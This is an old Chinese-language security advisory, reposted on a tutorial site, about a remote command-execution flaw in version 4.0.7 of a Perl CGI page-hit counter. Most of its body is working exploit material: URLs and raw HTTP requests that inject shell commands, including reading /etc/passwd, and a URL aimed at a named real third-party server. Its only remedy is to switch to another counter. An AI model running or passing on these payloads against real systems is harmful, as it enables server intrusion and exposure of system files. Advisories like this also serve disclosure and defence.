Home >Database >Mysql Tutorial >popular CGI web page access counter 4.0.7允许远程执行任
popular CGI web page access counter 4.0.7允许远程执行任
- WBOYOriginal
- 2016-06-07 15:05:561619browse
涉及程序: popular CGI web page access counter 4.0.7 描述: popular CGI web page access counter 4.0.7 允许 远程 执行 任意命令 详细: popular CGI web page access counter 4.0.7 版由于不检查用户输入,导致 允许 用户 执行 任意命令, 。用户所拥有
涉及程序:
popular CGI web page access counter 4.0.7
描述:
popular CGI web page access counter 4.0.7允许远程执行任意命令
详细:
popular CGI web page access counter 4.0.7 版由于不检查用户输入,导致允许用户执行任意命令,
。用户所拥有的执行这些命令的权限和WEB SERVER是一样的.使用其它的Exploits可以得到未打补丁的`系统的root权限。
这个计数器包含用perl script写成的"counter",和与"counter"多重连接的counter-old,counterfiglet,counterfiglet-ord, counterbanner, 和 counterbanner-ord.
以下例子说明此漏洞如何可以被利用.
使用如下URL
------------------
http://www.xxx.com/cgi-bin/counterfiglet/nc/f=;echo;w;uname%20-a;id
Passing commands in a variable
------------------------------
> telnet web-server www
GET /cgi-bin/counterfiglet/nc/f=;sh%20-c%20"$HTTP_X" HTTP/1.0
X: pwd;ls -la /etc;cat /etc/passwd
> telnet web-server www
GET /cgi-bin/counter/nl/ord/lang=english(1);system("$ENV"); HTTP/1.0
X: echo;id;uname -a;w
国外示范站点
http://seal.gatech.edu/cgi-bin/counterfiglet/nc/f=;echo;w;uname%20-a;ls
解决方案:
使用其它计数器。
Statement:
The content of this article is voluntarily contributed by netizens, and the copyright belongs to the original author. This site does not assume corresponding legal responsibility. If you find any content suspected of plagiarism or infringement, please contact admin@php.cn
Previous article:Oblog 4.5-4.6 access&mssql getshell 0dayNext article:MongoDB 数据库M